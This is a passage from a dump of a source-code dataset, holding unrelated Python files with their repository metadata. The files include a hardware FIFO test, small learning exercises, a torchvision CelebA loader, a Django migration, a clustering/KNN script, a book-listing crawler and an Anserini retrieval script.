REPORT_DELAY|2,
REPORT_SPECIAL|SPECIAL_DONE
], [
(2, {"0": 0b1}),
(4, {})
], flush_pending=False)
@simulation_test(sources=(1,))
def test_throttle_hyst(self, tb):
for x in range(17):
yield from tb.trigger(0, 1)
yield from tb.step()
self.assertEqual((yield tb.dut.throttle), 0)
yield from tb.trigger(0, 1)
yield from tb.step()
self.assertEqual((yield tb.dut.throttle), 1)
yield tb.fifo.re.eq(1)
for x in range(51):
yield
yield tb.fifo.re.eq(0)
yield
self.assertEqual((yield tb.dut.throttle), 0)
@simulation_test(sources=(1,))
def test_overrun(self, tb):
for x in range(20):
yield from tb.trigger(0, 1)
yield from tb.step()
self.assertEqual((yield tb.dut.overrun), 0)
yield from tb.trigger(0, 1)
yield from tb.step()
self.assertEqual((yield tb.dut.overrun), 1)
yield tb.fifo.re.eq(1)
for x in range(61):
while not (yield tb.fifo.readable):
yield
yield
yield tb.fifo.re.eq(0)
yield
yield from self.assertEmitted(tb, [
REPORT_DELAY|0b0000100,
REPORT_DELAY|0b0000000,
REPORT_DELAY|0b0000000,
REPORT_SPECIAL|SPECIAL_OVERRUN,
], [
(0x10000, "overrun"),
], flush_pending=False)
|
[
"[email protected]"
] | |
7b7420814b1496c3571d4d75207128c627f763d6
|
a61848fd53eb0b2d569e685781edd5852e739fc8
|
/find_all.py
|
09f8c580afb95bf2fb89fba173b629aa4c2f5925
|
[] |
no_license
|
guaracyalima/python_basics
|
41243e716c3723389a67f44b526d7a33538d3b6d
|
6456084b9735f59d9575b348dff71e9a7cc4917a
|
refs/heads/master
| 2021-08-15T07:57:34.692836 | 2017-11-17T16:05:17 | 2017-11-17T16:05:17 | 111,103,427 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 172 |
py
|
from bs4 import BeautifulSoup
with open('arquivo03.html', 'r') as f:
soup = BeautifulSoup(f, 'lxml')
tag_list = soup.find_all(['ul', 'div'])
print(tag_list)
|
[
"[email protected]"
] | |
18ae1dbba7d5c134023e183f45772eacc5724340
|
015d0ca2e84ee94bd694cfa5fd477d73eed90f36
|
/applications/expensive_seq/expensive_seq.py
|
b307f2b3585261380a99cdd732710b1528f8226c
|
[] |
no_license
|
Edudeiko/Hash-tables-module-project-CS
|
c00448d0e7918e2e433005e541f24da21db8ab37
|
85f23c994983493c64321dce900b4f3faba78003
|
refs/heads/master
| 2023-01-24T09:10:52.105077 | 2020-11-08T17:35:21 | 2020-11-08T17:35:21 | 307,555,285 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 496 |
py
|
'''
start with creating an empty cache table
'''
cache = {}
def expensive_seq(x, y, z):
if x <= 0:
return y + z
if (x, y, z) not in cache:
cache[(x, y, z)] = expensive_seq(x - 1, y + 1, z) + expensive_seq(x - 2, y + 2, z * 2) + expensive_seq(x - 3, y + 3, z * 3)
return cache[(x, y, z)]
if __name__ == "__main__":
for i in range(10):
x = expensive_seq(i*2, i*3, i*4)
print(f"{i*2} {i*3} {i*4} = {x}")
print(expensive_seq(150, 400, 800))
|
[
"[email protected]"
] | |
e0f17e5eeb6554f374cb320cd4367c2d1ad06c2c
|
03ed1f1e259dcf377b3163ee33622546b68379ab
|
/printerque.py
|
3f662a5714da763dfd66e03fe8cc0ad6e64d187d
|
[] |
no_license
|
dustiumus/py-comp-sci-lab
|
dd39aab2092b8c124cc9ca7d62a335631f188880
|
8b6842aafc369e9d18ef61c187089f7858a5b04b
|
refs/heads/main
| 2023-08-22T15:31:04.899642 | 2021-09-03T06:05:01 | 2021-09-03T06:05:01 | 402,664,502 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,795 |
py
|
class Queue():
"""FIFO queue.
Implemented as a linked list. This will be slower than
using a Python list for small lists but when the list
size is larger than ~5,000, it becomes faster to use,
as it's expensive to pop items off the front of a Python
list (this is a O(n) operation, whereas it's O(1) for
a linked list.
This is useful for studying how linked lists work but,
should you want one in a real-world program, see the
`collections.deque object` --- this is a
doubly-linked lists, but it will perform excellently,
given that it is implemented in C.
"""
def __init__(self, inlist):
self._tail = None
self._length = len(inlist)
prev = None
for item in inlist[::-1]:
node = Node(item, next=prev)
if self._tail is None:
self._tail = node
prev = node
self._head = prev
def __repr__(self):
if not self._head:
return "<Queue (empty)>"
else:
return f"<Queue head={self._head.data} tail={self._tail.data} length={self._length}>"
def enqueue(self, item):
"""Add item to end of queue."""
self._length += 1
node = Node(item)
if self._tail:
self._tail.next = node
self._tail = node
else:
self._head = self._tail = node
def dequeue(self):
"""Remove item from front of queue and return it."""
if not self._head:
raise QueueEmptyError()
self._length -= 1
node = self._head
self._head = self._head.next
if not self._head:
self._tail = None
return node.data
def __iter__(self):
"""Allow iteration over list.
__iter__ is a special method that, when defined,
allows you to loop over a list, so you can say things
like "for item in my_queue", and it will pop
successive items off.
"""
while True:
try:
yield self.dequeue()
except QueueEmptyError:
raise StopIteration
def length(self):
"""Return length of queue."""
return self._length
def peek(self):
"""Return, but don't remove, item at front of queue."""
if self.is_empty():
return None
return self._head.data
def empty(self):
"""Empty queue."""
self._tail = self._head = None
self._length = 0
def is_empty(self):
"""Is queue empty?"""
return not bool(self._length)
fruits = Queue(["apple", "berry", "cherry"])
fruits.enqueue("durian")
assert(fruits.length() == 4)
assert(fruits.dequeue() == "apple")
assert(fruits.length() == 3)
def add_jobs():
|
[
"[email protected]"
] | |
97ab50faddc4f97b4337834613ec49e7cd000426
|
45c2455a2ee69e5688fcb65eae8a6982ddc3db9a
|
/exercises/05_basic_scripts/task_5_1b.py
|
bca822d05799bcae12ad27cd0c87d337780bd72d
|
[] |
no_license
|
li-zard/pyeng-ex
|
3d5900b2da8e4ec065e6f5d42d48912c16660deb
|
8d012c73bf900dac9b5051961ce086bc49ea5925
|
refs/heads/main
| 2023-01-24T16:26:17.065511 | 2020-12-10T15:54:35 | 2020-12-10T15:54:35 | 316,801,693 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,770 |
py
|
# -*- coding: utf-8 -*-
"""
Задание 5.1b
Переделать скрипт из задания 5.1a таким образом, чтобы, при запросе параметра,
отображался список возможных параметров. Список параметров надо получить из словаря,
а не прописывать вручную.
Вывести информацию о соответствующем параметре, указанного устройства.
Пример выполнения скрипта:
$ python task_5_1b.py
Введите имя устройства: r1
Введите имя параметра (ios, model, vendor, location, ip): ip
10.255.0.1
Ограничение: нельзя изменять словарь london_co.
Все задания надо выполнять используя только пройденные темы.
То есть эту задачу можно решить без использования условия if.
"""
london_co = {
"r1": {
"location": "21 New Globe Walk",
"vendor": "Cisco",
"model": "4451",
"ios": "15.4",
"ip": "10.255.0.1",
},
"r2": {
"location": "21 New Globe Walk",
"vendor": "Cisco",
"model": "4451",
"ios": "15.4",
"ip": "10.255.0.2",
},
"sw1": {
"location": "21 New Globe Walk",
"vendor": "Cisco",
"model": "3850",
"ios": "3.6.XE",
"ip": "10.255.0.101",
"vlans": "10,20,30",
"routing": True,
},
}
dev=input("Please input device:")
param=input("Please input param:{}".format(str(london_co[dev].keys())))
device = london_co.get(dev)
print(device[param])
|
[
"[email protected]"
] | |
f3dafd535a8a693bec6ca22cd688aa45fee162b6
|
92ada67b0393303370867eb90d614b363537c8f1
|
/scripts/ugrid_wx.py
|
b1cee6491a8a4ded788e4d83c026e78c74d918d7
|
[] |
no_license
|
brandonmayer-zz/pyugrid
|
158d90a73947624e91f49e69b93c0fae8060d474
|
a101a929c1ec519c752f24889e00797a2514e20d
|
refs/heads/master
| 2021-05-28T06:27:59.350948 | 2014-07-12T21:55:34 | 2014-07-12T21:55:34 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,997 |
py
|
#!/usr/bin/env python
"""
ugid_wx.py:
A small wxPython utility app to visualize pyugrids, etc.
"""
import wx
## import the installed version
from wx.lib.floatcanvas import NavCanvas, FloatCanvas
class DrawFrame(wx.Frame):
"""
A frame used for the ugrid viewer
"""
#some parameters for drawing:
background_color = (200,200,200) # grey
label_size = 16
label_color = 'black'
label_background_color = background_color
node_color = 'black'
face_color = 'cyan'
face_edge_color = 'black'
edge_color = 'red'
def __init__(self, *args, **kwargs):
wx.Frame.__init__(self, *args, **kwargs)
self.CreateStatusBar()
# Add the Canvas
Canvas = NavCanvas.NavCanvas(self,-1,
size = (500,500),
ProjectionFun = None,
Debug = 0,
BackgroundColor = self.background_color,
).Canvas
self.Canvas = Canvas
FloatCanvas.EVT_MOTION(self.Canvas, self.OnMove )
self.Show()
Canvas.ZoomToBB()
def Draw_UGRID(self, grid):
"""
Draws a UGRID Object
"""
self.Canvas.ClearAll()
# add the elements:
nodes = grid.nodes
# add the elements:
for i, f in enumerate(grid.faces):
face = nodes[f]
self.Canvas.AddPolygon(face, FillColor=self.face_color, LineColor=self.face_edge_color, LineWidth=2)
mid = face.mean(axis=0)
self.Canvas.AddText(`i`, mid, Size=self.label_size, Position='cc')
# add the edges:
for i, e in enumerate(grid.edges):
edge = nodes[e]
self.Canvas.AddLine(edge, LineColor=self.edge_color, LineWidth=3)
mid = edge.mean(axis=0)
self.Canvas.AddText(`i`,
mid,
Size=self.label_size,
Position='cc',
Color=self.label_color,
BackgroundColor=self.label_background_color)
# add the Nodes
for i, n in enumerate(nodes):
self.Canvas.AddText(`i`, n, Size=self.label_size, BackgroundColor=self.label_background_color)
self.Canvas.AddPointSet(nodes, Diameter=5, Color=self.node_color)
self.Canvas.ZoomToBB()
def OnMove(self, event):
"""
Updates the status bar with the world coordinates
"""
self.SetStatusText("%.2f, %.2f"%tuple(event.Coords))
if __name__ == "__main__":
from pyugrid import test_examples
app = wx.App(False)
F = DrawFrame(None, title="UGRID Test App", size=(700,700) )
#F.Draw_UGRID( test_examples.two_triangles() )
F.Draw_UGRID( test_examples.twenty_one_triangles() )
app.MainLoop()
|
[
"[email protected]"
] | |
bfd4888edb395deaddfdc4022c9b829b04107625
|
024046de7eb1ffd46c77456418b1073e84af15b1
|
/torchvision/prototype/datasets/_builtin/celeba.py
|
ebfce4b652d5b78be5975d14d7c04ac8e4548bb6
|
[
"BSD-3-Clause"
] |
permissive
|
jiafatom/vision
|
ce31eba6fdffce77e9370e0816ffeb0d743bad80
|
7839bdbe1389e734b00529edd9a7566bb8701588
|
refs/heads/main
| 2023-08-27T22:56:28.723162 | 2021-10-25T19:10:20 | 2021-10-25T19:10:20 | 319,733,821 | 0 | 0 |
BSD-3-Clause
| 2020-12-08T19:01:41 | 2020-12-08T19:01:40 | null |
UTF-8
|
Python
| false | false | 6,753 |
py
|
import csv
import io
from typing import Any, Callable, Dict, List, Optional, Tuple, Iterator, Sequence
import torch
from torchdata.datapipes.iter import (
IterDataPipe,
Mapper,
Shuffler,
Filter,
ZipArchiveReader,
Zipper,
KeyZipper,
)
from torchvision.prototype.datasets.utils import (
Dataset,
DatasetConfig,
DatasetInfo,
GDriveResource,
OnlineResource,
DatasetType,
)
from torchvision.prototype.datasets.utils._internal import INFINITE_BUFFER_SIZE, getitem, path_accessor
csv.register_dialect("celeba", delimiter=" ", skipinitialspace=True)
class CelebACSVParser(IterDataPipe[Tuple[str, Dict[str, str]]]):
def __init__(
self,
datapipe: IterDataPipe[Tuple[Any, io.IOBase]],
*,
fieldnames: Optional[Sequence[str]] = None,
) -> None:
self.datapipe = datapipe
self.fieldnames = fieldnames
def __iter__(self) -> Iterator[Tuple[str, Dict[str, str]]]:
for _, file in self.datapipe:
file = (line.decode() for line in file)
if self.fieldnames:
fieldnames = self.fieldnames
else:
# The first row is skipped, because it only contains the number of samples
next(file)
# Empty field names are filtered out, because some files have an extra white space after the header
# line, which is recognized as extra column
fieldnames = [name for name in next(csv.reader([next(file)], dialect="celeba")) if name]
# Some files do not include a label for the image ID column
if fieldnames[0] != "image_id":
fieldnames.insert(0, "image_id")
for line in csv.DictReader(file, fieldnames=fieldnames, dialect="celeba"):
yield line.pop("image_id"), line
class CelebA(Dataset):
@property
def info(self) -> DatasetInfo:
return DatasetInfo(
"celeba",
type=DatasetType.IMAGE,
homepage="https://mmlab.ie.cuhk.edu.hk/projects/CelebA.html",
)
def resources(self, config: DatasetConfig) -> List[OnlineResource]:
splits = GDriveResource(
"0B7EVK8r0v71pY0NSMzRuSXJEVkk",
sha256="fc955bcb3ef8fbdf7d5640d9a8693a8431b5f2ee291a5c1449a1549e7e073fe7",
file_name="list_eval_partition.txt",
)
images = GDriveResource(
"0B7EVK8r0v71pZjFTYXZWM3FlRnM",
sha256="46fb89443c578308acf364d7d379fe1b9efb793042c0af734b6112e4fd3a8c74",
file_name="img_align_celeba.zip",
)
identities = GDriveResource(
"1_ee_0u7vcNLOfNLegJRHmolfH5ICW-XS",
sha256="c6143857c3e2630ac2da9f782e9c1232e5e59be993a9d44e8a7916c78a6158c0",
file_name="identity_CelebA.txt",
)
attributes = GDriveResource(
"0B7EVK8r0v71pblRyaVFSWGxPY0U",
sha256="f0e5da289d5ccf75ffe8811132694922b60f2af59256ed362afa03fefba324d0",
file_name="list_attr_celeba.txt",
)
bboxes = GDriveResource(
"0B7EVK8r0v71pbThiMVRxWXZ4dU0",
sha256="7487a82e57c4bb956c5445ae2df4a91ffa717e903c5fa22874ede0820c8ec41b",
file_name="list_bbox_celeba.txt",
)
landmarks = GDriveResource(
"0B7EVK8r0v71pd0FJY3Blby1HUTQ",
sha256="6c02a87569907f6db2ba99019085697596730e8129f67a3d61659f198c48d43b",
file_name="list_landmarks_align_celeba.txt",
)
return [splits, images, identities, attributes, bboxes, landmarks]
_SPLIT_ID_TO_NAME = {
"0": "train",
"1": "valid",
"2": "test",
}
def _filter_split(self, data: Tuple[str, Dict[str, str]], *, split: str) -> bool:
return self._SPLIT_ID_TO_NAME[data[1]["split_id"]] == split
def _collate_anns(self, data: Tuple[Tuple[str, Dict[str, str]], ...]) -> Tuple[str, Dict[str, Dict[str, str]]]:
(image_id, identity), (_, attributes), (_, bbox), (_, landmarks) = data
return image_id, dict(identity=identity, attributes=attributes, bbox=bbox, landmarks=landmarks)
def _collate_and_decode_sample(
self,
data: Tuple[Tuple[str, Tuple[str, List[str]], Tuple[str, io.IOBase]], Tuple[str, Dict[str, Any]]],
*,
decoder: Optional[Callable[[io.IOBase], torch.Tensor]],
) -> Dict[str, Any]:
split_and_image_data, ann_data = data
_, _, image_data = split_and_image_data
path, buffer = image_data
_, ann = ann_data
image = decoder(buffer) if decoder else buffer
identity = int(ann["identity"]["identity"])
attributes = {attr: value == "1" for attr, value in ann["attributes"].items()}
bbox = torch.tensor([int(ann["bbox"][key]) for key in ("x_1", "y_1", "width", "height")])
landmarks = {
landmark: torch.tensor((int(ann["landmarks"][f"{landmark}_x"]), int(ann["landmarks"][f"{landmark}_y"])))
for landmark in {key[:-2] for key in ann["landmarks"].keys()}
}
return dict(
path=path,
image=image,
identity=identity,
attributes=attributes,
bbox=bbox,
landmarks=landmarks,
)
def _make_datapipe(
self,
resource_dps: List[IterDataPipe],
*,
config: DatasetConfig,
decoder: Optional[Callable[[io.IOBase], torch.Tensor]],
) -> IterDataPipe[Dict[str, Any]]:
splits_dp, images_dp, identities_dp, attributes_dp, bboxes_dp, landmarks_dp = resource_dps
splits_dp = CelebACSVParser(splits_dp, fieldnames=("image_id", "split_id"))
splits_dp = Filter(splits_dp, self._filter_split, fn_kwargs=dict(split=config.split))
splits_dp = Shuffler(splits_dp, buffer_size=INFINITE_BUFFER_SIZE)
images_dp = ZipArchiveReader(images_dp)
anns_dp = Zipper(
*[
CelebACSVParser(dp, fieldnames=fieldnames)
for dp, fieldnames in (
(identities_dp, ("image_id", "identity")),
(attributes_dp, None),
(bboxes_dp, None),
(landmarks_dp, None),
)
]
)
anns_dp = Mapper(anns_dp, self._collate_anns)
dp = KeyZipper(
splits_dp,
images_dp,
key_fn=getitem(0),
ref_key_fn=path_accessor("name"),
buffer_size=INFINITE_BUFFER_SIZE,
keep_key=True,
)
dp = KeyZipper(dp, anns_dp, key_fn=getitem(0), buffer_size=INFINITE_BUFFER_SIZE)
return Mapper(dp, self._collate_and_decode_sample, fn_kwargs=dict(decoder=decoder))
|
[
"[email protected]"
] | |
6bb43b959aa84ac5c99dfd6715abbd08d279a89d
|
340cffbb27fa99491e12902c673e3cca1593737c
|
/homebytwo/routes/migrations/0003_remove_segment.py
|
fc446f32dcc45042e6dd59bab2e22b826340523d
|
[
"MIT"
] |
permissive
|
HomebyTwo/homebytwo
|
85d90b9b453fe0d50ca44a48437b6f35631f57b5
|
29d26ce9f5586943e3b64c95aa4ce9ea7263bd10
|
refs/heads/master
| 2022-12-09T15:43:42.765518 | 2020-12-01T11:31:49 | 2020-12-01T11:31:49 | 75,376,872 | 7 | 0 |
MIT
| 2022-12-09T11:19:29 | 2016-12-02T08:35:07 |
Python
|
UTF-8
|
Python
| false | false | 568 |
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.3 on 2017-03-03 11:39
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('routes', '0002_route_data'),
]
operations = [
migrations.RemoveField(
model_name='segment',
name='end_place',
),
migrations.RemoveField(
model_name='segment',
name='start_place',
),
migrations.DeleteModel(
name='Segment',
),
]
|
[
"[email protected]"
] | |
18f71ff081c3f7d2ea9d18c72d99ea233b3b5d56
|
3eb9b5da2fd9e5e8acfac096921ab7f6b95ddfea
|
/ml-clustering-neuronal-networks/main.py
|
1c7f767bec9ed816da26b7f34ce920555a2d82b1
|
[] |
no_license
|
sebastianvolti/ml-clustering-neuronal-networks
|
a401c3f54dc37978ea22dfb19d4ed03dd96a25df
|
7f386a12718ebd25227d0bc3d07e3eb82373dee2
|
refs/heads/master
| 2023-03-30T07:18:13.833712 | 2021-03-06T20:18:23 | 2021-03-06T20:18:23 | 345,186,528 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,418 |
py
|
import pandas as pd
import numpy as np
import argparse
import copy
import knn
import logging
import statistics
import random
import utils
import dataset_analysis
import means
import means_plot
from attributes import DATASET_ATTRS, DATASET_FILE, DATASET_FILE_NUM, DATASET_HEADERS, DATASET_CLASS
from sklearn import neighbors
################## Config básica ##################
DEBUG = True
# Lee argumentos
ap = argparse.ArgumentParser(
description='Tarea de AprendAut')
ap.add_argument('-s', '--seed', default=3, help='Indica la semilla a utilizar para la librería random')
ap.add_argument('-d', '--debug_level', default=2, help='0 si no se quiere imprimir nada, 1 para mensajes de info, 2 para mensajes de debug')
ap.add_argument('-p', '--part', help='Indica con valores a, b o c, qué parte de la tarea se quiere ejecutar')
ap.add_argument('-g', '--graficos', default=0, help='1 si se quieren mostrar los graficos, 0 si no')
ap.add_argument('-r', '--runs', default=500, help='Corridas de k-means buscando clusters optimos')
ap.add_argument('-l', '--limit', default=300, help='Limite de iteraciones por cada corrida de k-means')
ap.add_argument('-n', '--normalize', default=0, help='1 si se quiere trabajar con atributos normalizados, 0 si no')
ap.add_argument('-i', '--ideology_groups', default=0, help='1 si se quiere trabajar con ideologias agrupadas, 0 si no')
args = vars(ap.parse_args())
seed = int(args['seed'])
debug_level = int(args['debug_level'])
part = args['part']
plot_grafics = int(args['graficos'])
runs_k_means = int(args['runs'])
iters_k_means = int(args['limit'])
normalize = int(args['normalize'])
ideology_groups = int(args['ideology_groups'])
if debug_level == 0:
logging_level = logging.WARNING
elif debug_level == 1:
logging_level = logging.INFO
elif debug_level == 2:
logging_level = logging.DEBUG
logging.basicConfig(level=logging_level, format='%(message)s')
################## Comienzo del main ##################
def main():
random.seed(seed)
np.random.seed(seed)
# Lectura del csv numérico
dataset_num = pd.read_csv(DATASET_FILE_NUM, delimiter=',', names=DATASET_HEADERS, header=None, engine='python')
# Preprocesamiento del conjunto de datos
dataset = utils.preprocess_dataset(dataset_num, ideology_groups)
if part == 'a':
# Analisis del conjunto de datos normal
analysis = dataset_analysis.get_analysis(dataset, DATASET_ATTRS, DATASET_CLASS)
print(analysis)
# Analisis del conjunto de datos numérico
analysis_num = dataset_analysis.get_analysis(dataset_num, DATASET_ATTRS, DATASET_CLASS)
print(analysis_num)
if (plot_grafics > 0):
dataset_analysis.get_plots(dataset_num)
pc_dataset = dataset_analysis.get_pca(dataset_num)
dataset_analysis.plot_clusters(pc_dataset, 'pc1', 'pc2')
elif part == 'c':
if (normalize > 0):
dataset = utils.normalize(dataset)
if (plot_grafics > 0):
means_plot.pruebita(dataset)
#k-means
means.means(dataset, runs_k_means, iters_k_means, plot_grafics)
elif part == 'd':
if (normalize > 0):
dataset = utils.normalize(dataset)
# Cross validation
cv_examples, cv_classes = utils.get_classes(dataset)
ks = [x for x in range(1, 44, 2)]
best_k = ks[0]
best_score = 0
for k in ks:
logging.info(f"Evaluando cross validation de KNN con k={k}")
scores = knn.cross_val(neighbors.KNeighborsClassifier(n_neighbors=k), cv_examples, cv_classes.values.ravel(), scoring='accuracy', cv_folds=5)
mean_score = statistics.mean(scores)
logging.info(f"El accuracy promedio obtenido es {mean_score*100:.2f}%")
if mean_score > best_score:
best_k = k
best_score = mean_score
logging.info(f"")
logging.info(f"El mejor k es {best_k}")
logging.info(f"")
# Particionamiento del dataset
TSET_PERCENTAGE = 0.9
training_set, evaluation_set = utils.partition_sets(dataset, TSET_PERCENTAGE, no_class=True)
training_examples, training_classes = utils.get_classes(training_set)
evaluation_examples, evaluation_classes = utils.get_classes(evaluation_set)
# KNN
classifier_knn = knn.scikit_knn(training_examples, training_classes, k=best_k)
obtained_classes_knn = utils.classify_examples(classifier_knn, evaluation_examples)
# Métricas
logging.info(f"Resultados KNN Scikit")
logging.info(f"Resultados micro")
metrics = utils.get_metrics(obtained_classes_knn, evaluation_classes, average='micro')
utils.print_metrics(metrics)
logging.info(f"")
logging.info(f"Resultados macro")
metrics = utils.get_metrics(obtained_classes_knn, evaluation_classes, average='macro')
utils.print_metrics(metrics)
elif part == 'e':
estratificacion=dataset['ideology'].value_counts()
attrs=attrs = copy.deepcopy(DATASET_ATTRS)
print(estratificacion)
dataset_analysis.mean_var_std(dataset)
dataset_analysis.histogram_vs_ideology(dataset,attrs)
dataset_analysis.kdeplot_vs_ideology(dataset,attrs)
dataset_analysis.Box_plot(dataset,attrs)
if __name__ == "__main__":
main()
|
[
"[email protected]"
] | |
16321033f51ae465e1c80dde7ae0eea9def38c33
|
e26f8069953f17a267d9dcb61d3bb18d6a4f1847
|
/step3/scraping/py_zip/python_crawler_final.py
|
c8978ba193ef2002acb91fd3bdc5d6cd6ff95433
|
[] |
no_license
|
BingSuYam/Ubuntu_Python_crawling-scraping
|
a89dbd8e12f8831bbe9c5b8e507f2d31303b807a
|
3ebd88cd269b275a1f983a4c730d81b4318569ef
|
refs/heads/master
| 2021-05-23T08:02:33.180672 | 2020-04-19T09:15:53 | 2020-04-19T09:15:53 | 253,188,824 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,734 |
py
|
import time # time 모듈을 임포트 합니다.
import re # re 모듈을 임포트 합니다.
import requests
import lxml.html
from pymongo import MongoClient
def main():
"""
크롤러의 메인 처리
"""
# 크롤러 호스트의 MongoDB에 접속합니다.
client = MongoClient('localhost', 27017)
# scraping 데이터베이스의 ebooks 콜렉션
collection = client.scraping.ebooks
# 데이터를 식별할 수 있는 유일키를 저장할 key 필드에 인덱스를 생성합니다.
collection.create_index('key', unique=True)
# 목록 페이지를 추출합니다.
response = requests.get('http://www.hanbit.co.kr/store/books/new_book_list.html')
# 상세페이지의 URL 목록을 추출합니다.
urls = scrape_list_page(response)
for url in urls:
cnt = 1
# URL로 키를 추출합니다.
key = extract_key(url)
# MongoDB에서 key에 해당하는 데이터를 검색합니다.
ebook = collection.find_one({'key':key})
# MongoDB에 존재하지 않는 경우만 상세 페이지를 크롤링합니다.
if not ebook:
time.sleep(1)
response = requests.get(url) # Session을 사용해 상세 페이지를 추출합니다.
ebook = scrape_detail_page(response) # 상세 페이지에서 상세 정보를 추출합니다.
# 책 정보를 MongoDB에 저장합니다.
collection.insert_one(ebook)
print('>>>> 책 정보를 저장합니다. ::: %d' , cnt)
cnt+=1
def scrape_list_page(response):
"""
목록 페이지의 Response에서 상세 페이지의 URL을 추출합니다.
"""
root = lxml.html.fromstring(response.content)
root.make_links_absolute(response.url)
for a in root.cssselect('.view_box .book_tit a'):
url = a.get('href')
yield url
def scrape_detail_page(response) :
"""
상세 페이지의 Response에서 책 정보를 dict로 추출합니다.
"""
root = lxml.html.fromstring(response.content)
ebook = {
'url': response.url,
'key': extract_key(response.url),
'title': root.cssselect('.store_product_info_box h3')[0].text_content(),
'price': root.cssselect('.pbr strong')[0].text_content(),
'content': "생략"
}
return ebook
def extract_key(url) :
"""
URL에서 키(URL 끝의 p_code)를 추출합니다.
"""
m = re.search(r"p_code=(.+)",url)
return m.group(1)
def normalize_spaces(s):
"""
연결돼 있는 공백을 하나의 공백으로 변경합니다.
"""
return re.sub(r'\s+', '',s).strip()
if __name__ == '__main__':
main()
|
[
"[email protected]"
] | |
f94ef394016ab76292cd46b7c523ddb2b452f32a
|
edda54d9c20a9fa7ee4ab029f8adedbec89fef9a
|
/contactquery.py
|
e0cd85cbf686200cbde051f5f7cdd545b9082075
|
[] |
no_license
|
travisbrkr1234/javaassist
|
7e88ce0c51537dab10266b953d3739224a01ce77
|
9fb4ab8cca370865712d1403e365afc92aae5206
|
refs/heads/master
| 2016-09-06T17:02:37.594670 | 2015-07-10T15:13:27 | 2015-07-10T15:13:27 | 38,782,103 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 382 |
py
|
import sys
sys.path.append("C:\\Users\\carlos.ochoa\\Documents\\Support Dev\\Python\\csvToolbox\\")
import csv
import ISServer_master as ISServer
infusionsoftapp = "as113"
infusionsoftAPIKey = ""
thisserver = ISServer.ISServer(infusionsoftapp, infusionsoftAPIKey)
allrecords = thisserver.getAllRecords("Contact")
for eachrecord in allrecords:
print "id: %s"%(eachrecord["Id"])
|
[
"[email protected]"
] | |
97cc36dd32b2d5cd5c4ab97c7b39c7420193152f
|
8b9c84f2540ef9de8830232898b7b3636523ceff
|
/Problem1.py
|
4d8d558f4df6dcc8a1440776e4ca8d187309fb29
|
[] |
no_license
|
s-andromeda/Binary-Search-3
|
e06b73352af51666bd7d8bf0f4f33a6ec54b9dba
|
eafd90e65bd04ca544c80d5f24a9ceef55786ad2
|
refs/heads/master
| 2022-11-17T07:18:50.414405 | 2020-07-21T07:06:29 | 2020-07-21T07:06:29 | 280,072,057 | 0 | 0 | null | 2020-07-16T06:24:20 | 2020-07-16T06:24:19 | null |
UTF-8
|
Python
| false | false | 704 |
py
|
"""
Student : Shahreen Shahjahan Psyche
Time : O(log N) [binary search]
Space : O(1) [No Auxiliary Space Has Been Used]
Pased Test Cases : Yes
"""
class Solution:
def myPow(self, x: float, n: int) -> float:
# base case
if n == 0:
return 1
# calling recursive function after halfing n
temp = self.myPow(x, int(n/2))
# if n is even
if n%2 == 0:
return temp * temp
else:
# if n is positive
if n > 0:
return temp * temp * x
else:
return temp * temp * (1/x)
|
[
"[email protected]"
] | |
0ecfe2662d567c63db7e2c659f8b3058a8b7db30
|
1c2b90d6e0c44faabadace30f81cefb037e46e76
|
/Anserini-master/src/main/python/jdiq2018_effectiveness/run_batch.py
|
ba6de46914aa5ce638e030bcd0d6559640922b49
|
[
"Apache-2.0"
] |
permissive
|
sandeepsuri/capstone_ryerson
|
77bd33e1362db1ec36aafc8d7c0faa75e0998a12
|
c632f690e75a17144a681428ee05660a86a02666
|
refs/heads/master
| 2023-04-16T13:52:18.967986 | 2020-01-31T09:57:01 | 2020-01-31T09:57:01 | 156,599,953 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 8,888 |
py
|
# -*- coding: utf-8 -*-
"""
Anserini: A toolkit for reproducible information retrieval research built on Lucene
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import subprocess
import argparse
from multiprocessing import Pool
import json
import logging
import yaml
from search import Search
from evaluation import Evaluation
from effectiveness import Effectiveness
logger = logging.getLogger('jdiq2018_effectiveness')
logger.setLevel(logging.INFO)
# create console handler with a higher log level
ch = logging.StreamHandler()
ch.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
ch.setFormatter(formatter)
# add the handlers to the logger
logger.addHandler(ch)
parallelism=1
def batch_everything(all_params, func):
if len(all_params) == 0:
return
p = Pool(parallelism)
p.map(func, all_params)
def isclose(a, b, rel_tol=1e-09, abs_tol=0.0):
return abs(a-b) <= max(rel_tol * max(abs(a), abs(b)), abs_tol)
def get_index_path(yaml_data):
"""
Find the possible index path
"""
index_path = os.path.join('lucene-index.{0}.pos+docvectors{1}'.format(yaml_data['name'], \
'+rawdocs' if '-storeRawDocs' in yaml_data['index_options'] else ''))
if not os.path.exists(index_path):
index_path = yaml_data['index_path']
if not index_path or not os.path.exists(index_path):
for input_root in yaml_data['input_roots']:
if os.path.exists(os.path.join(input_root, yaml_data['index_path'])):
index_path = os.path.join(input_root, yaml_data['index_path'])
break
return index_path
def batch_retrieval(collection_yaml, models_yaml, output_root):
all_params = []
program = os.path.join(collection_yaml['anserini_root'], 'target/appassembler/bin', 'SearchCollection')
index_path = get_index_path(collection_yaml)
this_output_root = os.path.join(output_root, collection_yaml['name'])
if not os.path.exists(this_output_root):
os.makedirs(this_output_root)
logger.info('='*10+'Batch Retrieval Parameters Generated'+'='*10)
for topic in collection_yaml['topics']:
